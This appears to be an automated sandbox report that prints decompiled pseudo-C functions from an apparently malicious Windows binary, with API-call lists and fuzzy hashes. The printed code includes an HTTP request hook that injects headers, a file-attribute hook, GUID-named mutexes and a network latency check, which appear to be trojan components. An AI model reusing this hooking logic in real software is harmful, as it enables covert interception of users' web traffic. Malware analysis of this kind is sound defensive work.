    				void* _t18;
    				void* _t19;
    
    				_t3 = GetProcessWindowStation();
    				_t12 = 0;
    				_t19 = E0041A1E0(_t3);
    				if(_t19 == 0) {
    					L6:
    					_t5 = SetProcessWindowStation(_a4);
    					if(_t5 != 0) {
    						goto L8;
    					} else {
    						return _t5;
    					}
    				} else {
    					_t18 = E0041A1E0(_a4);
    					if(_t18 != 0) {
    						if(lstrcmpiW(_t19, _t18) == 0) {
    							_t12 = 1;
    						}
    						HeapFree( *0x42e6d4, 0, _t18);
    					}
    					HeapFree( *0x42e6d4, 0, _t19);
    					if(_t12 != 0) {
    						L8:
    						return 1;
    					} else {
    						goto L6;
    					}
    				}
    			}










    APIs
    • GetProcessWindowStation.USER32(?,?,00000000,0041A3C5,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A273
      • Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,?,00000000,?,00000000), ref: 0041A207
      • Part of subcall function 0041A1E0: HeapAlloc.KERNEL32(?,00000008,?), ref: 0041A229
      • Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,?,?), ref: 0041A243
    • lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2A0
    • HeapFree.KERNEL32(?,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2B5
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2C1
    • SetProcessWindowStation.USER32(?,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2CD
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeInformationObjectProcessStationUserWindow$Alloclstrcmpi
    • String ID:
    • API String ID: 2651280557-0
    • Opcode ID: b136f6f976b5ed88ab4652f4956fd04f0dd4f3c54d0efcd18a916bfa6c72ce96
    • Instruction ID: 2040e6aa85ed6874ed9d6dcc3b28255d690d9755b69c721ae35a2c70695d39a4
    • Opcode Fuzzy Hash: b136f6f976b5ed88ab4652f4956fd04f0dd4f3c54d0efcd18a916bfa6c72ce96
    • Instruction Fuzzy Hash: 40F0D13234320127C220A766AC44FAB776C9BE17A0F14443AFA0097310DA3AE85587AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417FC0(WCHAR* __edi, void* _a4, long _a8) {
    				void* _t6;
    				long _t11;
    				WCHAR* _t13;
    				void* _t14;
    				long _t15;
    
    				_t13 = __edi;
    				_t15 = _a8;
    				_t11 = 0;
    				_t14 = CreateFileW(__edi, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t14 != 0xffffffff) {
    					_t6 = _a4;
    					if(_t6 == 0 || _t15 == 0 || WriteFile(_t14, _t6, _t15,  &_a8, 0) != 0) {
    						_t11 = 1;
    					}
    					CloseHandle(_t14);
    					if(_t11 != 1) {
    						SetFileAttributesW(_t13, 0x80);
    						DeleteFileW(_t13);
    					}
    				}
    				return _t11;
    			}









    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,00000000,00412EE6,?,00000000), ref: 00417FDC
    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00412EE6,?,00000000), ref: 00417FFF
    • CloseHandle.KERNEL32(00000000,?,00000000,00412EE6,?,00000000), ref: 0041800C
    • SetFileAttributesW.KERNEL32(?,00000080,?,00000000,00412EE6,?,00000000), ref: 0041801D
    • DeleteFileW.KERNEL32(?,?,00000000,00412EE6,?,00000000), ref: 00418024
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$AttributesCloseCreateDeleteHandleWrite
    • String ID:
    • API String ID: 4109557446-0
    • Opcode ID: 72cfcebbc607913f7bd96cd4498baa6de7259e6606f4dc81ee13c040ed708bcc
    • Instruction ID: 0c4f44c00b3cc10d36ff1604a0158dbd11031c375665e6d842dece277b052db2
    • Opcode Fuzzy Hash: 72cfcebbc607913f7bd96cd4498baa6de7259e6606f4dc81ee13c040ed708bcc
    • Instruction Fuzzy Hash: F7F0C8312813047BE3205B209D49FE73B5CAB09B50F09011DF651B61E0DFA55889C76C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C010(void* _a4) {
    				void* _t6;
    				intOrPtr* _t9;
    				intOrPtr _t10;
    				int _t11;
    				void* _t12;
    
    				_t12 = _a4;
    				_t11 = InternetCloseHandle(_t12);
    				if(WaitForSingleObject( *0x42edbc, 0) == 0) {
    					L10:
    					return _t11;
    				} else {
    					EnterCriticalSection(0x42d3ec);
    					if(_t12 == 0) {
    						L9:
    						LeaveCriticalSection(0x42d3ec);
    						goto L10;
    					} else {
    						_t10 =  *0x42d408; // 0x0
    						_t6 = 0;
    						if(_t10 != 0) {
    							_t9 =  *0x42d404; // 0x0
    							while( *_t9 != _t12) {
    								_t6 = _t6 + 1;
    								_t9 = _t9 + 0x24;
    								if(_t6 < _t10) {
    									continue;
    								} else {
    									LeaveCriticalSection(0x42d3ec);
    									return _t11;
    								}
    								goto L11;
    							}
    							if(_t6 != 0xffffffff) {
    								E0040AB30(_t6);
    							}
    						}
    						goto L9;
    					}
    				}
    				L11:
    			}









    APIs
    • InternetCloseHandle.WININET(?), ref: 0040C017
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040C027
    • EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040C036
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C063
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C07F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$CloseEnterHandleInternetObjectSingleWait
    • String ID:
    • API String ID: 728985351-0
    • Opcode ID: eab4a19b1178702a7dc22b6a242e56df1f21b5d3f2bc41615843312c4e51d226
    • Instruction ID: e15a466101f71e5fff6dc4075761070a20626ead8d028e6ca64cb5bc7266f447
    • Opcode Fuzzy Hash: eab4a19b1178702a7dc22b6a242e56df1f21b5d3f2bc41615843312c4e51d226
    • Instruction Fuzzy Hash: 22F08135B40210C7C62467A9ED88F4B3765ABC6711358433BF502F22F0C6389847C66D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,0042786A,00000000,?,?,?,00000000,00427C53,?,00000001,000000A0,?,?), ref: 004272D7
    • ReleaseMutex.KERNEL32(?,?,?,?,00000000,00427C53,?,00000001,000000A0,?,?), ref: 0042730C
    • IsWindow.USER32(?), ref: 00427313
    • PostMessageW.USER32(?,00000215,00000000,00000000), ref: 0042732D
    • SendMessageW.USER32(?,00000215,00000000,00000000), ref: 00427339
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: 012948ecbff93eba352602cb0e3349690419297354f52afa58567f760f042e87
    • Instruction ID: 29400ff5c99324c20b3d18f4a07447326f7a1397cf838a9622f9731488d6794f
    • Opcode Fuzzy Hash: 012948ecbff93eba352602cb0e3349690419297354f52afa58567f760f042e87
    • Instruction Fuzzy Hash: E2014B74208301DBC3208F28E948E6BB7B4FB98710F184B6DF895D3360C774A444CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041D340(short* __edi, WCHAR* _a8) {
    				intOrPtr _v28;
    				char _v668;
    				char _v796;
    				char _v1056;
    				char _v1076;
    				char _v1080;
    				char _v1086;
    				char _v1096;
    				char _v1106;
    				char _v1556;
    				void* __esi;
    				intOrPtr _t28;
    				int _t29;
    				signed int _t30;
    				signed int _t31;
    				int _t33;
    				signed int _t34;
    				void* _t35;
    				void* _t36;
    				WCHAR* _t42;
    				short* _t47;
    				char* _t49;
    				WCHAR* _t50;
    				void* _t51;
    
    				_t47 = __edi;
    				_t50 = _a8;
    				E0041D150( &_v796);
    				E00410820( &_v1056,  &_v668, 0x102);
    				_t44 =  &_v1556;
    				E00410820( &_v1556, 0x42eb80, 0x1e6);
    				E00412640( &_v1080, _t44, 0x1e6);
    				_t28 = _v28;
    				if(_t28 == 0) {
    					_t49 =  &_v1096;
    					L6:
    					_t29 = 0;
    					if(_v1106 == 0) {
    						L9:
    						_t30 = MultiByteToWideChar(0, 0,  &_v1106, _t29, _t47, 0xa);
    						if(_t30 >= 0xa) {
    							_t30 = 0;
    						}
    						_t47[_t30] = 0;
    						if(_t30 == 0) {
    							L25:
    							_t31 = 0;
    							 *_t50 = 0;
    							 *_t47 = 0;
    							goto L26;
    						} else {
    							_t42 = _t47;
    							if(_t47 == 0) {
    								L17:
    								if(PathCombineW(_t50, L"SOFTWARE\\Microsoft", _t42) == 0) {
    									goto L25;
    								}
    								_t33 = 0;
    								if(_t49 == 0 ||  *_t49 == 0) {
    									L22:
    									_t31 = MultiByteToWideChar(0, 0, _t49, _t33, _t47, 0xa);
    									if(_t31 >= 0xa) {
    										_t31 = 0;
    									}
    									_t47[_t31] = 0;
    									if(_t31 != 0) {
    										L26:
    										return _t31;
    									} else {
    										goto L25;
    									}
    								} else {
    									do {
    										_t33 = _t33 + 1;
    									} while (_t49[_t33] != 0);
    									goto L22;
    								}
    							}
    							while(1) {
    								_t34 =  *_t42 & 0x0000ffff;
    								if(_t34 != 0x5c && _t34 != 0x2f) {
    									goto L17;
    								}
    								_t42 =  &(_t42[1]);
    							}
    							goto L17;
    						}
    					}
    					do {
    						_t29 = _t29 + 1;
    					} while ( *((char*)(_t51 + _t29 + 0x1be)) != 0);
    					goto L9;
    				}
    				_t35 = _t28 - 1;
    				if(_t35 == 0) {
    					_t49 =  &_v1086;
    					goto L6;
    				}
    				_t36 = _t35 - 1;
    				if(_t36 == 0) {
    					_t49 =  &_v1076;
    					goto L6;
    				}
    				return _t36;
    			}




























    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0041D402
    • PathCombineW.SHLWAPI(?,SOFTWARE\Microsoft,0042E704,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D439
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D460
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWide$CombinePath
    • String ID: SOFTWARE\Microsoft
    • API String ID: 1428641638-1421276983
    • Opcode ID: 13d6b896f3585b1f6387c13d7fae3e189d03c9c24a870b64ae15f5e3acc9caee
    • Instruction ID: 0b129dd3e7090026901ed36b09d424622f4f1925d1b1619b701fca247166d06f
    • Opcode Fuzzy Hash: 13d6b896f3585b1f6387c13d7fae3e189d03c9c24a870b64ae15f5e3acc9caee
    • Instruction Fuzzy Hash: 0C3104F1A483516AD334DB249C45BFB73A9AF94704F04082FE995D7291EB78B9C0C29E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A110(WCHAR* _a4, union _GET_FILEEX_INFO_LEVELS _a8, void* _a12) {
    				void* __edi;
    				void* __ebp;
    				signed int _t16;
    				void* _t17;
    				WCHAR* _t23;
    				void* _t26;
    				signed short* _t27;
    				void _t29;
    				void* _t32;
    				union _GET_FILEEX_INFO_LEVELS _t33;
    
    				_t23 = _a4;
    				_t33 = _a8;
    				if(_t33 != 0x78f16360 || _t23 == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					L14:
    					return GetFileAttributesExW(_t23, _t33, _a12);
    				} else {
    					_t16 = 0;
    					_t27 = 0x42ed66;
    					if( *_t23 == 0) {
    						L10:
    						_t17 = _t16 + 0xffffffda;
    						__eflags = _t17;
    						if(__eflags == 0) {
    							goto L12;
    						} else {
    							goto L11;
    						}
    					} else {
    						do {
    							_t16 = _t16 + 1;
    						} while (_t23[_t16] != 0);
    						if(_t16 != 0x26) {
    							goto L10;
    						} else {
    							_t26 = 0;
    							_t32 = _t23 - 0x42ed66;
    							while(1) {
    								_t17 = ( *(_t32 + _t27) & 0x0000ffff) - ( *_t27 & 0x0000ffff);
    								if(_t17 != 0) {
    									break;
    								}
    								_t26 = _t26 + 1;
    								_t27 =  &(_t27[1]);
    								if(_t26 < 0x26) {
    									continue;
    								} else {
    									L12:
    									_t29 = VirtualAlloc(0, 0x1000, 0x3000, 4);
    									_t43 = _t29;
    									if(_t29 == 0) {
    										goto L14;
    									} else {
    										E0040FC20(_t29, _t33, _t43);
    										 *_a12 = _t29;
    										return 1;
    									}
    								}
    								goto L15;
    							}
    							L11:
    							__eflags = _t17;
    							_t25 = 0 | _t17 > 0x00000000;
    							_t9 = _t25 - 1; // -1
    							__eflags = (_t17 > 0) + _t9;
    							if(__eflags != 0) {
    								goto L14;
    							} else {
    								goto L12;
    							}
    						}
    					}
    				}
    				L15:
    			}














    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041A138
    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 0041A1A8
    • GetFileAttributesExW.KERNEL32(?,?,?), ref: 0041A1D2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocAttributesFileObjectSingleVirtualWait
    • String ID: fB
    • API String ID: 2067563439-1509387770
    • Opcode ID: 2fa431b499c3d05ff3381177bcd954569a518c8053f40f71d8a9e83f3504c634
    • Instruction ID: c94650b04033a7bb5ba6436a91ac8bb26e3983938c23e55559d70869732cf74e
    • Opcode Fuzzy Hash: 2fa431b499c3d05ff3381177bcd954569a518c8053f40f71d8a9e83f3504c634
    • Instruction Fuzzy Hash: 17110332306312A7D7308F69DC80BBBB3A8FB85351F14853BF601C6284E73998A5825A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0041D6F0(void* __eflags) {
    				char _v48;
    				char _v72;
    				char _v84;
    				void* _v88;
    				void* __edi;
    				void* __esi;
    				void* _t16;
    				CHAR* _t27;
    				void* _t28;
    				WCHAR* _t31;
    				struct HINSTANCE__* _t32;
    				void* _t34;
    
    				_t31 =  &_v72;
    				E00424100(0xe3, _t31);
    				_t32 = GetModuleHandleW(_t31);
    				if(_t32 != 0) {
    					_t27 =  &_v84;
    					E004240C0(0xe4, _t27);
    					_t28 = GetProcAddress(_t32, _t27);
    					__eflags = _t28;
    					if(_t28 == 0) {
    						L4:
    						__eflags = 0;
    						return 0;
    					} else {
    						_t33 =  &_v48;
    						_v88 = 0;
    						E00424100(0xd5,  &_v48);
    						_push(0x1e6);
    						_push("0xE07FD4A0");
    						_t16 = E00411DC0(__eflags,  &_v88, _t33, 0x2020000);
    						__eflags = _t16;
    						if(_t16 > 0) {
    							_t34 = _v88;
    							 *_t28(0, _t34, "#", 0x10040);
    							__eflags = _t34;
    							if(_t34 != 0) {
    								HeapFree( *0x42e6d4, 0, _t34);
    							}
    							return 1;
    						} else {
    							goto L4;
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 0041D705
    • GetProcAddress.KERNEL32(00000000,?), ref: 0041D72B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0xE07FD4A0
    • API String ID: 1646373207-1065333866
    • Opcode ID: 0a47555fded8d4814bd641e02d37237e095be87868ef2ff6a20402c512c19ecd
    • Instruction ID: 7e2907d0c201f07cc163f0919484b5d31eda1b491e013aefd9da79797569f5d9
    • Opcode Fuzzy Hash: 0a47555fded8d4814bd641e02d37237e095be87868ef2ff6a20402c512c19ecd
    • Instruction Fuzzy Hash: A11125BAA0037037D6217B19EC0ABCB7B99DFD0B50F80441AFD04B7381DA38D94586EA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040BEB0(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
    				char _v20;
    				char _v24;
    				WCHAR* _v36;
    				long _v44;
    				long _v48;
    				long _v52;
    				intOrPtr _v56;
    				long _t17;
    				struct _GOPHER_FIND_DATAA _t18;
    				int _t19;
    				WCHAR* _t22;
    				long _t26;
    				void* _t33;
    
    				_t17 = WaitForSingleObject( *0x42edbc, 0);
    				_t33 = _a4;
    				_t18 = _a8;
    				if(_t17 == 0) {
    					L8:
    					_t19 = HttpSendRequestExW(_t33, _t18, _a12, _a16, _a20);
    					L9:
    					return _t19;
    				}
    				_push(0x28);
    				if(_t18 != 0) {
    					_push(_t18);
    					_push( &_v44);
    					E00410820();
    					_t26 = _v44;
    					if(_t26 != 0) {
    						_t22 = _v36;
    						if(_t22 != 0) {
    							HttpAddRequestHeadersW(_t33, _t22, _t26, 0xa0000000);
    							_v52 = 0;
    							_v48 = 0;
    						}
    					}
    				} else {
    					_push(_t18);
    					_push( &_v44);
    					E00410870(_t18);
    					_v56 = 0x28;
    				}
    				_t19 = E0040BB80(_t33,  &_v24,  &_v20);
    				if(_t19 != 0xffffffff) {
    					goto L9;
    				} else {
    					_t18 =  &_v44;
    					goto L8;
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BEC2
    • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 0040BF10
    • HttpSendRequestExW.WININET(?,?,?,?,?), ref: 0040BF4D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HttpRequest$HeadersObjectSendSingleWait
    • String ID: (
    • API String ID: 2328130936-3887548279
    • Opcode ID: d6479ef9380a0b144eb09de015bbf429e148b72c91c985423fa770a630f156a5
    • Instruction ID: 486407b1eeee0ec063aa1d65b5b519647f3d8b40f9334c9bcd03a7936921a867
    • Opcode Fuzzy Hash: d6479ef9380a0b144eb09de015bbf429e148b72c91c985423fa770a630f156a5
    • Instruction Fuzzy Hash: 4E115E71204306ABD310DF25DC85FBB77ACEB84754F004A2EB955E3290DB74E9458BEA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412B40(struct _STARTUPINFOW* __eax, void* __ecx, WCHAR* __edx, WCHAR* _a4) {
    				char _v72;
    				struct _PROCESS_INFORMATION _v88;
    				char _v92;
    				WCHAR* _t14;
    				struct _STARTUPINFOW* _t27;
    				WCHAR* _t30;
    				void* _t33;
    
    				_t30 = __edx;
    				_t33 = __ecx;
    				_v92 = 0;
    				if(__eax != 0) {
    					_t27 = __eax;
    				} else {
    					E00410870( &_v72,  &_v72, __eax, 0x44);
    					_v88.hThread = 0x44;
    					_t27 =  &(_v88.hThread);
    				}
    				_t14 =  &_v92;
    				if(_t30 != 0) {
    					_t14 = _t30;
    				}
    				if(CreateProcessW(0, _t14, 0, 0, 0, 0x4000000, 0, _a4, _t27,  &_v88) == 0) {
    					return 0;
    				} else {
    					if(_t33 == 0) {
    						CloseHandle(_v88.hThread);
    						CloseHandle(_v88);
    						return _v88.dwProcessId;
    					} else {
    						E00410820(_t33,  &_v88, 0x10);
    						return _v92;
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateProcess
    • String ID: D
    • API String ID: 2922976086-2746444292
    • Opcode ID: bd701f2a9f65dc9310330b62ddc1fe7f8572f881f9edfac2d4ff7529288562ac
    • Instruction ID: 9a1b4ec5adeeaa8d6eb28548dba5ae46276bb9d24ecf5e8bb5758280c9ddd1e0
    • Opcode Fuzzy Hash: bd701f2a9f65dc9310330b62ddc1fe7f8572f881f9edfac2d4ff7529288562ac
    • Instruction Fuzzy Hash: 561186766083016BD314EF58CD41FEB73D9AF84B00F04881EB645E7280EAB4E95487DA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0041CCB0(void* __eflags) {
    				intOrPtr _v28;
    				char _v704;
    				char _v800;
    				void* _v1154;
    				char _v1472;
    				char _v1600;
    				char _v1612;
    				char _v1864;
    				char _v1888;
    				char _v2000;
    				short _v2012;
    				void* __esi;
    				void* _t24;
    				void* _t36;
    
    				E0041D150( &_v800);
    				E0041D150( &_v1600);
    				E00410820( &_v1864,  &_v1472, 0x102);
    				_t32 =  &_v1612;
    				E00410820( &_v1612, 0x42eb80, 0x1e6);
    				E00412640( &_v1888, _t32, 0x1e6);
    				E00416E10(0x42eb70,  &_v704, _v28,  &_v2000, 2);
    				_t24 = CreateMutexW(0x42e930, 1,  &_v2012);
    				_t36 = _t24;
    				if(_t36 == 0) {
    					return _t24;
    				} else {
    					if(GetLastError() != 0xb7) {
    						return _t36;
    					}
    					CloseHandle(_t36);
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • CreateMutexW.KERNEL32(0042E930,00000001,00000000,?,00000102,00000002,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD41
    • GetLastError.KERNEL32(?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD4D
    • CloseHandle.KERNEL32(00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD5B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateErrorFromHandleLastMutexString
    • String ID: pB
    • API String ID: 2863246993-3059159000
    • Opcode ID: 205a08c1149a270bb5d32c2752b16fce8942d3538c232e0b5f4ba3358f80894a
    • Instruction ID: da45fb755a0463556b21fe0e782765b9ee616ee5c9b102e9b867d3a0624d6e0e
    • Opcode Fuzzy Hash: 205a08c1149a270bb5d32c2752b16fce8942d3538c232e0b5f4ba3358f80894a
    • Instruction Fuzzy Hash: BE11827164835067D330E760DD82FDF73A99F84700F40493EF64996191D778A984CADA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413650(intOrPtr _a4) {
    				long _v4;
    				intOrPtr _v8;
    				long _v12;
    				long _v16;
    				long _v20;
    				long _v24;
    				long _v28;
    				char* _v32;
    				void* _v36;
    				intOrPtr _v40;
    				long _v44;
    				char _v48;
    				void* _t21;
    				long _t25;
    				void* _t28;
    
    				_v48 = 0x101;
    				_v44 = 0;
    				_v40 = _a4;
    				_v36 = E00413580();
    				_v32 = "http://www.google.com/webhp";
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				_v8 = 0x80000;
    				_v4 = 0;
    				_t25 = GetTickCount();
    				if(E004133B0( &_v48, 0) == 0) {
    					_t28 = 0;
    				} else {
    					_t28 = GetTickCount() - _t25;
    				}
    				_t21 = _v36;
    				if(_t21 != 0) {
    					HeapFree( *0x42e6d4, 0, _t21);
    				}
    				return _t28;
    			}

    APIs
      • Part of subcall function 00413580: LoadLibraryA.KERNEL32(urlmon.dll,?,?), ref: 0041358F
      • Part of subcall function 00413580: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004135A5
      • Part of subcall function 00413580: FreeLibrary.KERNEL32(00000000), ref: 00413605
    • GetTickCount.KERNEL32 ref: 004136A2
      • Part of subcall function 004133B0: WaitForSingleObject.KERNEL32(?,?), ref: 00413408
      • Part of subcall function 004133B0: InternetCloseHandle.WININET(00000000), ref: 004134B9
      • Part of subcall function 004133B0: InternetQueryOptionA.WININET(00000000,00000015,?,?), ref: 004134DC
      • Part of subcall function 004133B0: InternetCloseHandle.WININET(00000000), ref: 004134EB
    • GetTickCount.KERNEL32 ref: 004136B4
    • HeapFree.KERNEL32(?,00000000,?,00000000), ref: 004136CF
    Strings
    • http://www.google.com/webhp, xrefs: 0041367A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseCountFreeHandleLibraryTick$AddressHeapLoadObjectOptionProcQuerySingleWait
    • String ID: http://www.google.com/webhp
    • API String ID: 1490942418-2670330958
    • Opcode ID: 83656254e56a2ae5c13a6328937a08eff427c3461c6d1dd9723235f4eb3558a8
    • Instruction ID: 1d759d173662f66218cf3a02b2666a09aebee79664cb88d164b8e872f0b1da39
    • Opcode Fuzzy Hash: 83656254e56a2ae5c13a6328937a08eff427c3461c6d1dd9723235f4eb3558a8
    • Instruction Fuzzy Hash: 970109B1615310ABC210DF2A994044BFBE8EFC8B55F50092FF994D3320D7B4CA498F9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0041A520(intOrPtr _a4) {
    				char _v672;
    				char _v800;
    				void* __esi;
    				long _t6;
    				void* _t18;
    
    				if( *0x42e788 == 0) {
    					E0041D150( &_v800);
    					E00416E10(0x42eb70,  &_v672,  *0x42e904, 0x42e788, 2);
    				}
    				_t18 = CreateMutexW(0x42e930, 0, 0x42e788);
    				if(_t18 == 0) {
    					L6:
    					return 0;
    				} else {
    					_t6 = WaitForSingleObject(_t18, 0xffffffff);
    					if(_t6 == 0 || _t6 == 0x80) {
    						 *0x42e718 = _t18;
    						E0041A440(_t18, _a4);
    						return 1;
    					} else {
    						CloseHandle(_t18);
    						goto L6;
    					}
    				}
    			}

    APIs
    • CreateMutexW.KERNEL32(0042E930,00000000,0042E788,?), ref: 0041A569
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041A578
    • CloseHandle.KERNEL32(00000000), ref: 0041A58A
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
      • Part of subcall function 0041A440: RegOpenKeyExW.ADVAPI32 ref: 0041A48E
      • Part of subcall function 0041A440: HeapFree.KERNEL32(?,00000000,?,00000000,?), ref: 0041A4FD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
